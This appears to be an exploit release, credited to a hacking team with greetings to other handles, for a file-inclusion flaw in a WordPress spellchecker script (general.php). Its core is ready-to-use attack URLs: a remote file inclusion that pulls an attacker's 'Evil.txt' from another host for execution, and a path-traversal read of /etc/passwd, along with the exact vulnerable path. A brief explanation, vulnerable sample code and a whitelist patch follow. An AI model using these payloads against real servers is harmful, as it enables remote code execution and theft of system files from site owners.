++ RFI & LFI Wordpress Spellchecker Plugin Vulnerability ++ ----------- Released Date = 12/4/2011 --------------------------------------------------------------------------------- Author = Dr Trojan (www.paksecteam.com) --------------------------------------------------------------------------------- Greets = Sacred1947 - ShozY - Shadow008 - HackerBradri - Death Angel - Yasir Fati --------------------------------------------------------------------------------- Version = 3.1 --------------------------------------------------------------------------------- Tested On = Windows 7 & Xampp --------------------------------------------------------------------------------- Rfi Exploit = /general.php?file=http://sitename.com/Evil.txt? Lfi Exploit = /general.php?file=../../../../../../../etc/passwd Root Location = wordpress/wp-includes/js/tinymce/plugins/spellchecker/includes/general.php Web Location = www.sitename.com/general.php?file= P.O.C:- RFI Example = www.sitename.com/general.php?file=http://sitename.com/Evil.txt ? LFI Example = www.sitename.com/general.php?file=../../../../../../../etc/passwd Vulnerability description:- An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise. Vulnerable Example Code = <? include("includes/" . $_GET["file"]); ?> Patch for vulnerability: Build a whitelist for positive file names. Do not only limit the file name to specific paths or extensions. <? $files = array("index.php", "main.php"); if(!in_array($_GET["file"], $files)) exit; ?>